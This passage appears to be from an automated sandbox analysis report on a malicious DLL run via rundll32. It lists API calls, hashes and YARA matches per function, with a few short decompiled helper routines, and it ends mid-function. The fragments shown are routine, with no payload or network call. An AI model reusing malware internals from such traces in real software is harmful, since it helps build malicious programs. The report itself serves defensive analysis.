                                            • Instruction Fuzzy Hash: 630171762082557F8631AA269C5CC2BBE6DFBCA760F114A19FC66D6280DA209C04C77A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(?), ref: 05802942
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • mbstowcs.NTDLL ref: 0580295C
                                            • lstrlen.KERNEL32(?), ref: 05802967
                                            • mbstowcs.NTDLL ref: 05802981
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,00000000,76C869A0,?,00000250,?,00000000), ref: 05805A60
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,?,00000000), ref: 05805A6C
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805AB4
                                              • Part of subcall function 05805A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805ACF
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(0000002C), ref: 05805B07
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?), ref: 05805B0F
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805B32
                                              • Part of subcall function 05805A14: wcscpy.NTDLL ref: 05805B44
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                            • String ID:
                                            • API String ID: 1961997177-0
                                            • Opcode ID: f85aae5500cee9f3b45c74bf2e85faefb4299ce1b33c8dea08508254a259ebe6
                                            • Instruction ID: eced7e4b2c146cae6b515b950fb6d305050557d9d2f4d3bbc7964aebc1e8cfeb
                                            • Opcode Fuzzy Hash: f85aae5500cee9f3b45c74bf2e85faefb4299ce1b33c8dea08508254a259ebe6
                                            • Instruction Fuzzy Hash: 70019236600304B7CF216BA98C49F8F7EADEB84750F10A026BE05E7180EA75DD0097A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,05820641,?,00000000,00000000), ref: 058100B9
                                            • lstrlen.KERNEL32(05D7C178,?,05820641,?,00000000,00000000), ref: 058100DA
                                            • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 058100F2
                                            • lstrcpy.KERNEL32(00000000,05D7C178), ref: 05810104
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 1929783139-0
                                            • Opcode ID: 7c4a1532c707f8d46a6c9fb49afa80e1e64c967d43cf11d006cd67b03033073d
                                            • Instruction ID: 0451524ba56efe417b36f75bc1a210119edd253ccd36cb0d896c6cb25a5db243
                                            • Opcode Fuzzy Hash: 7c4a1532c707f8d46a6c9fb49afa80e1e64c967d43cf11d006cd67b03033073d
                                            • Instruction Fuzzy Hash: 6601DB76904208FBC7219BACAC8DE9F7FBCAB88201F048065FD0AE3241DE349985C775
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(?), ref: 05801227
                                            • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 0580124D
                                            • lstrcpy.KERNEL32(00000014,?), ref: 05801272
                                            • memcpy.NTDLL(?,?,?), ref: 0580127F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeaplstrcpylstrlenmemcpy
                                            • String ID:
                                            • API String ID: 1388643974-0
                                            • Opcode ID: 6212f676a3d284bf843f5c31f313408e982ca963a44f87b1c46eb4fb9e3de75a
                                            • Instruction ID: 159c0ac69895e023ac9abcf27a8e91236901daed62a8961a151cf8228a2178f8
                                            • Opcode Fuzzy Hash: 6212f676a3d284bf843f5c31f313408e982ca963a44f87b1c46eb4fb9e3de75a
                                            • Instruction Fuzzy Hash: 8511497191020AEFCB21CF58D884A9ABFF8FB48714F10841AFC4AC7220C771E954CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(?,765BD3B0,?,76C85520,058022AF,00000000,?,?,?), ref: 0580970D
                                            • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 05809725
                                            • memcpy.NTDLL(0000000C,?,00000001), ref: 0580973B
                                              • Part of subcall function 058152C3: StrChrA.SHLWAPI(?,?,765BD3B0,05D7C304,00000000,?,0580CE0C,?,00000020,05D7C304), ref: 058152E8
                                              • Part of subcall function 058152C3: StrTrimA.SHLWAPI(?,05824FC4,00000000,?,0580CE0C,?,00000020,05D7C304), ref: 05815307
                                              • Part of subcall function 058152C3: StrChrA.SHLWAPI(?,?,?,0580CE0C,?,00000020,05D7C304), ref: 05815313
                                            • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 0580976D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                                            • String ID:
                                            • API String ID: 3208927540-0
                                            • Opcode ID: 2b379fdbe0c2beeea030334452eb6a8200a363c5e0db25f9fc8120d7f251f355
                                            • Instruction ID: 9e3f5ffd5621f93d030ceda62f64aeb228ae4b20e9fb9a5721b8da34a03b8010
                                            • Opcode Fuzzy Hash: 2b379fdbe0c2beeea030334452eb6a8200a363c5e0db25f9fc8120d7f251f355
                                            • Instruction Fuzzy Hash: B601D433305309ABE7715E25AC89F77BEA8EB80711F008425FE4BD6192CB60AC498765
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • RtlInitializeCriticalSection.NTDLL(05829420), ref: 0581179B
                                            • RtlInitializeCriticalSection.NTDLL(05829400), ref: 058117B1
                                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058117C2
                                            • GetModuleHandleA.KERNEL32(00001663,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058117F6
                                              • Part of subcall function 0581C203: GetModuleHandleA.KERNEL32(?,00000001,773D9EB0,00000000,?,?,?,?,00000000,058117D9), ref: 0581C21B
                                              • Part of subcall function 0581C203: LoadLibraryA.KERNEL32(?), ref: 0581C2BC
                                              • Part of subcall function 0581C203: FreeLibrary.KERNEL32(00000000), ref: 0581C2C7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                            • String ID:
                                            • API String ID: 1711133254-0
                                            • Opcode ID: 04cd59a284c8691edabdf2cc7ce828d3ccdacc2caa1c95f5b023cf54437ebc61
                                            • Instruction ID: fd471b53b0f28c7f7c6f94b52729ff9112b751768926db8946f7808093e20eb5
                                            • Opcode Fuzzy Hash: 04cd59a284c8691edabdf2cc7ce828d3ccdacc2caa1c95f5b023cf54437ebc61
                                            • Instruction Fuzzy Hash: 10112A71A202109FDB60AFAAA88E9453FE8F748625F00C42AFE09C7240DF756CC4CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(05829448), ref: 0580338E
                                            • Sleep.KERNEL32(0000000A), ref: 05803398
                                            • SetEvent.KERNEL32 ref: 058033EF
                                            • RtlLeaveCriticalSection.NTDLL(05829448), ref: 0580340E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterEventLeaveSleep
                                            • String ID:
                                            • API String ID: 1925615494-0
                                            • Opcode ID: 7950c788a4c1b95aa7b7e1ad4c36352e4985db5f648a270c885d2bcdd290c7f9
                                            • Instruction ID: e5b6811d68d226fdb54700506620e867b88e2f3f43614b3f06c3ae753fec7168
                                            • Opcode Fuzzy Hash: 7950c788a4c1b95aa7b7e1ad4c36352e4985db5f648a270c885d2bcdd290c7f9
                                            • Instruction Fuzzy Hash: 7C018070654304EBDBA0ABA5AC4BF593FA8FB05700F009411FE05D61C0DF74AD84CB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05807C54: lstrlen.KERNEL32(?,?,00000000,0580FABE), ref: 05807C59
                                              • Part of subcall function 05807C54: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05807C6E
                                              • Part of subcall function 05807C54: wsprintfA.USER32 ref: 05807C8A
                                              • Part of subcall function 05807C54: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05807CA6
                                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0580FAD6
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0580FAE5
                                            • CloseHandle.KERNEL32(00000000), ref: 0580FAEF
                                            • GetLastError.KERNEL32 ref: 0580FAF7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                                            • String ID:
                                            • API String ID: 4042893638-0
                                            • Opcode ID: c6790e2a987ecf14b9ea332c57432090750dbd078f2b364492e8bb35fed509e0
                                            • Instruction ID: 35726106184282f8bfa5e0a3cc2b0f3441235366dabf32aac645a1521628f9c2
                                            • Opcode Fuzzy Hash: c6790e2a987ecf14b9ea332c57432090750dbd078f2b364492e8bb35fed509e0
                                            • Instruction Fuzzy Hash: CCF0D632304214BBD7B0AB69EC4DF5B7F5DFB41660F10D115FE0AD50D0CA7059848AB6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrcatW.KERNEL32(?,?), ref: 0581FE15
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 058034C6
                                              • Part of subcall function 05803486: GetLastError.KERNEL32 ref: 058034D0
                                              • Part of subcall function 05803486: WaitForSingleObject.KERNEL32(000000C8), ref: 058034F5
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 05803518
                                              • Part of subcall function 05803486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 05803540
                                              • Part of subcall function 05803486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 05803555
                                              • Part of subcall function 05803486: SetEndOfFile.KERNEL32(?), ref: 05803562
                                              • Part of subcall function 05803486: CloseHandle.KERNEL32(?), ref: 0580357A
                                            • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,0581FA24,?,?,00001000,?,?,00001000), ref: 0581FE38
                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,0581FA24,?,?,00001000,?,?,00001000), ref: 0581FE5A
                                            • GetLastError.KERNEL32(?,0581FA24,?,?,00001000,?,?,00001000), ref: 0581FE6E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                            • String ID:
                                            • API String ID: 3370347312-0
                                            • Opcode ID: de83e9514ab8b7902e391c829ad18cb1970041457fe0f44f9da54b8886370fdb
                                            • Instruction ID: 967f4cae953edb7d5da42af6526f7ef50b007699d0ac5896b003ae82cc4443e6
                                            • Opcode Fuzzy Hash: de83e9514ab8b7902e391c829ad18cb1970041457fe0f44f9da54b8886370fdb
                                            • Instruction Fuzzy Hash: 85F08C32244204BBDB615F609C0AF9E3E2AAF15750F108514FF42E80E1DB7169618BBE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • InterlockedExchange.KERNEL32(05829080,00000000), ref: 0580E090
                                            • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 0580E0AB
                                            • lstrcpy.KERNEL32(00000000,?), ref: 0580E0D4
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0580E0F5
                                              • Part of subcall function 0580608A: SetEvent.KERNEL32(?,?,0581F846), ref: 0580609F
                                              • Part of subcall function 0580608A: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0581F846), ref: 058060BF
                                              • Part of subcall function 0580608A: CloseHandle.KERNEL32(00000000,?,0581F846), ref: 058060C8
                                              • Part of subcall function 0580608A: CloseHandle.KERNEL32(00000000,?,?,0581F846), ref: 058060D2
                                              • Part of subcall function 0580608A: RtlEnterCriticalSection.NTDLL(?), ref: 058060DA
                                              • Part of subcall function 0580608A: RtlLeaveCriticalSection.NTDLL(?), ref: 058060F2
                                              • Part of subcall function 0580608A: CloseHandle.KERNEL32(?), ref: 0580610E
                                              • Part of subcall function 0580608A: LocalFree.KERNEL32(?), ref: 05806119
                                              • Part of subcall function 0580608A: RtlDeleteCriticalSection.NTDLL(?), ref: 05806123
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                            • String ID:
                                            • API String ID: 1103286547-0
                                            • Opcode ID: b119fd32fec90151c396165a56f794a95ac06c0e9a619c75e81feb9c6027c6fb
                                            • Instruction ID: ea66403b00fe827aa288a43628c2a8a80fcfac8fdcd7cc4562cddc02aea81811
                                            • Opcode Fuzzy Hash: b119fd32fec90151c396165a56f794a95ac06c0e9a619c75e81feb9c6027c6fb
                                            • Instruction Fuzzy Hash: C0F0AF3236022077DA701A65AC0EF873E6DFB90B21F054420FE06E62D0CD65AC85CB66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F24BC(void* __esi) {
                                            				struct _SECURITY_ATTRIBUTES* _v4;
                                            				void* _t8;
                                            				void* _t10;
                                            
                                            				_v4 = 0;
                                            				memset(__esi, 0, 0x38);
                                            				_t8 = CreateEventA(0, 1, 0, 0);
                                            				 *(__esi + 0x1c) = _t8;
                                            				if(_t8 != 0) {
                                            					_t10 = CreateEventA(0, 1, 1, 0);
                                            					 *(__esi + 0x20) = _t10;
                                            					if(_t10 == 0) {
                                            						CloseHandle( *(__esi + 0x1c));
                                            					} else {
                                            						_v4 = 1;
                                            					}
                                            				}
                                            				return _v4;
                                            			}
                                            Instruction addresses (one per decompiled statement, in order): 0x049f24c6, 0x049f24ca, 0x049f24df, 0x049f24e1, 0x049f24e6, 0x049f24ec, 0x049f24ee, 0x049f24f3, 0x049f24fe, 0x049f24f5, 0x049f24f5, 0x049f24f5, 0x049f24f3, 0x049f250c

                                            APIs
                                            • memset.NTDLL ref: 049F24CA
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,76CC81D0), ref: 049F24DF
                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 049F24EC
                                            • CloseHandle.KERNEL32(?), ref: 049F24FE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: CreateEvent$CloseHandlememset
                                            • String ID:
                                            • API String ID: 2812548120-0
                                            • Opcode ID: 120faf149b0859d33fbd8c5caa17e8d3db0e07a1f0e7cac458a0fd74752d2e38
                                            • Instruction ID: 6a515f4045df7f8ca0b420afc767fc864d6a4c42d3c691a433bb56c7c7d7973b
                                            • Opcode Fuzzy Hash: 120faf149b0859d33fbd8c5caa17e8d3db0e07a1f0e7cac458a0fd74752d2e38
                                            • Instruction Fuzzy Hash: 06F05EF110470C7FD314AF26DCC4D27BBACEB862ACB11497EF64682501D676BC098B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 0581647F
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0581A696,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 05816494
                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0580D3E9,?,?), ref: 058164A1
                                            • CloseHandle.KERNEL32(?,?,?,?,0580D3E9,?,?), ref: 058164B3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateEvent$CloseHandlememset
                                            • String ID:
                                            • API String ID: 2812548120-0
                                            • Opcode ID: d1616b3a81c2b4c197b1ed90aaf062a6ded45a847d543e8a5434995368578074
                                            • Instruction ID: 972a7a351477acdb0279055d1501b3261195f5f143a685f133905ef1997d797b
                                            • Opcode Fuzzy Hash: d1616b3a81c2b4c197b1ed90aaf062a6ded45a847d543e8a5434995368578074
                                            • Instruction Fuzzy Hash: 7BF03AB510470C6FD220AF26DC84C27BBACEB86198B15892EF98382511DA75AC048BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • HeapFree.KERNEL32(00000000,?), ref: 05805EDF
                                            • RtlExitUserThread.NTDLL(00000000), ref: 05805EF2
                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05805F03
                                            • _aulldiv.NTDLL(?,?,00002710,00000000), ref: 05805F16
                                              • Part of subcall function 0581A952: lstrlen.KERNEL32(0580B047,00000000,00000000,00000000,?,0582090A,?,0580B047,00000000), ref: 0581A968
                                              • Part of subcall function 0581A952: lstrlen.KERNEL32(?,?,0582090A,?,0580B047,00000000), ref: 0581A96F
                                              • Part of subcall function 0581A952: RtlAllocateHeap.NTDLL(00000000,00000029), ref: 0581A97D
                                              • Part of subcall function 0581A952: wsprintfA.USER32 ref: 0581A99F
                                              • Part of subcall function 0581A952: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0581A9D0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$FreeTimelstrlen$AllocateExitFileSystemThreadUser_aulldivwsprintf
                                            • String ID:
                                            • API String ID: 157450322-0
                                            • Opcode ID: dae6bb86a5164db9fde7631e308947efb00d708da8ea57803d8834da3bd02cc2
                                            • Instruction ID: a136fb48da9121cf5ecc3bb0f7065f8043ae0e6a77ae1564be475cb1c4f32398
                                            • Opcode Fuzzy Hash: dae6bb86a5164db9fde7631e308947efb00d708da8ea57803d8834da3bd02cc2
                                            • Instruction Fuzzy Hash: D2F06936510204BFDB215BAADC4EF8A7FACEB45720F004465FA5AD21A0CB75AC85CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,05819299,000000FF,05D7B7F0,?,?,0581BB0E,0000003A,05D7B7F0), ref: 058070B7
                                            • GetLastError.KERNEL32(?,?,0581BB0E,0000003A,05D7B7F0,?,?,?,05806B9D,00000001,00000000,?), ref: 058070C2
                                            • WaitNamedPipeA.KERNEL32(00002710), ref: 058070E4
                                            • WaitForSingleObject.KERNEL32(00000000,?,?,0581BB0E,0000003A,05D7B7F0,?,?,?,05806B9D,00000001,00000000,?), ref: 058070F2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                            • String ID:
                                            • API String ID: 4211439915-0
                                            • Opcode ID: 8caf6eed8d79a2ff26cc7affcef65b83961eb012404546a9f2c3f6edbf97d3bf
                                            • Instruction ID: 30aaf83db8cbd3aa53fc0ebf0f440bf3d11ac9f7b5a9482aa57f96b5ee935d80
                                            • Opcode Fuzzy Hash: 8caf6eed8d79a2ff26cc7affcef65b83961eb012404546a9f2c3f6edbf97d3bf
                                            • Instruction Fuzzy Hash: 0EF09632605120ABD7716666AC8EF977F15FB01371F12C161FD1AE61E0DA713C91C6A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(?,?,00000000,0580FABE), ref: 05807C59
                                            • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05807C6E
                                            • wsprintfA.USER32 ref: 05807C8A
                                              • Part of subcall function 0580B968: memset.NTDLL ref: 0580B97D
                                              • Part of subcall function 0580B968: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0580B9B6
                                              • Part of subcall function 0580B968: wcstombs.NTDLL ref: 0580B9C0
                                              • Part of subcall function 0580B968: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0580B9F1
                                              • Part of subcall function 0580B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0580B8C3), ref: 0580BA1D
                                              • Part of subcall function 0580B968: TerminateProcess.KERNEL32(?,000003E5), ref: 0580BA33
                                              • Part of subcall function 0580B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0580B8C3), ref: 0580BA47
                                              • Part of subcall function 0580B968: CloseHandle.KERNEL32(?), ref: 0580BA7A
                                              • Part of subcall function 0580B968: CloseHandle.KERNEL32(?), ref: 0580BA7F
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05807CA6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                            • String ID:
                                            • API String ID: 1624158581-0
                                            • Opcode ID: 5e02e0a289c188fd032ff46695a3fa58bbc587e9a4cde3b89a4026e541f53a53
                                            • Instruction ID: e746bb0b852a495bad3f42250c1d93e40fa69b609d23cd4828079ac56da30341
                                            • Opcode Fuzzy Hash: 5e02e0a289c188fd032ff46695a3fa58bbc587e9a4cde3b89a4026e541f53a53
                                            • Instruction Fuzzy Hash: 62F0B4326101147BDA701729BC0AFAB3E6DDBC1731F154111FD01D71E0DE20AC858675
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 0580CDC8
                                            • Sleep.KERNEL32(0000000A), ref: 0580CDD2
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580CDFA
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 0580CE18
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                            • String ID:
                                            • API String ID: 58946197-0
                                            • Opcode ID: 74d5407b9a1927aabf3cebbfb6757b9a29134300de4988042a7d508f64a654a1
                                            • Instruction ID: e0c5d5190184bc379e456c8b9023984998dfda3af9f650fd3ff07443dc2ea456
                                            • Opcode Fuzzy Hash: 74d5407b9a1927aabf3cebbfb6757b9a29134300de4988042a7d508f64a654a1
                                            • Instruction Fuzzy Hash: 11F03A71654241ABEB709FA8DC4AF167FA5AB10600F14D810FD46C62E1CA30FCD4CB6A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F5976() {
                                            				void* _t1;
                                            				intOrPtr _t5;
                                            				void* _t6;
                                            				void* _t7;
                                            				void* _t11;
                                            
                                            				_t1 =  *0x49fa30c; // 0x2cc
                                            				if(_t1 == 0) {
                                            					L8:
                                            					return 0;
                                            				}
                                            				SetEvent(_t1);
                                            				_t11 = 0x7fffffff;
                                            				while(1) {
                                            					SleepEx(0x64, 1);
                                            					_t5 =  *0x49fa35c; // 0x0
                                            					if(_t5 == 0) {
                                            						break;
                                            					}
                                            					_t11 = _t11 - 0x64;
                                            					if(_t11 > 0) {
                                            						continue;
                                            					}
                                            					break;
                                            				}
                                            				_t6 =  *0x49fa30c; // 0x2cc
                                            				if(_t6 != 0) {
                                            					CloseHandle(_t6);
                                            				}
                                            				_t7 =  *0x49fa2d8; // 0x4b80000
                                            				if(_t7 != 0) {
                                            					HeapDestroy(_t7);
                                            				}
                                            				goto L8;
                                            			}

                                            APIs
                                            • SetEvent.KERNEL32(000002CC,00000001,049F3DC4), ref: 049F5981
                                            • SleepEx.KERNEL32(00000064,00000001), ref: 049F5990
                                            • CloseHandle.KERNEL32(000002CC), ref: 049F59B1
                                            • HeapDestroy.KERNEL32(04B80000), ref: 049F59C1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: CloseDestroyEventHandleHeapSleep
                                            • String ID:
                                            • API String ID: 4109453060-0
                                            • Opcode ID: db7f9aeb1396c4a4d18e19afcc14e3e15fc13b8435d82aae6d1a11c783397ac8
                                            • Instruction ID: 7dd52204b3035d76b3fe16b49f38f0c65de9c65b952215d242cd3a91f6dd0ef8
                                            • Opcode Fuzzy Hash: db7f9aeb1396c4a4d18e19afcc14e3e15fc13b8435d82aae6d1a11c783397ac8
                                            • Instruction Fuzzy Hash: 70F01CB5B05312ABDB185B359C4CF663FDCEB04775B494130FD04D7A86CB68EC808A60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 37%
                                            			E049F3F7E() {
                                            				void* _v0;
                                            				void** _t1;
                                            				void** _t3;
                                            				void** _t5;
                                            				void** _t7;
                                            				void** _t8;
                                            				void* _t10;
                                            
                                            				// Global context structure; the critical section lives at offset 0x10 (0x04F79570).
                                            				_t3 =  *0x49fa3cc; // 0x4f795b0
                                            				RtlEnterCriticalSection( &(_t3[0x10])); // unresolved __imp__ in the decompiler output; resolved from the APIs list (ref: 049F3F87)
